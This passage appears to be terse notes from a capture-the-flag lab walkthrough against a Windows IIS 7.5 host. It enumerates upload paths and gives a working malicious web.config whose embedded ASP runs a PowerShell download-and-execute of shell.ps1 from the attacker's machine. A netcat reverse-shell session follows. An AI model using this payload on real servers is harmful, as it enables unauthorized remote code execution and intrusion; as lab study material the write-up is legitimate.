2 :80

===============================================================
2021/05/03 17:53:31 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx        (Status: 200) [Size: 941]
/UploadedFiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
/aspnet_client

<input type="submit" name="btnUpload" value="Upload" onclick="return ValidateFile();" id="btnUpload" />

.png files works and is viewable when uploaded.
.asp and .aspx fails; time to experiment with file extensions
Cannot upload with double extension or null byte file extensions

Searching for IIS 7.5 file upload exploit shows there's a RCE using web.config for IIS
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
web.cofig
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <handlers accessPolicy="Read, Script, Write">
            <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
        </handlers>
        <security>
            <requestFiltering>
                <fileExtensions>
                    <remove fileExtension=".config" />
                </fileExtensions>
                <hiddenSegments>
                    <remove segment="web.config" />
                </hiddenSegments>
            </requestFiltering>
        </security>
    </system.webServer>
    <appSettings>
    </appSettings>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd.exe /c powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.93] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
bounty\merlin

Last updated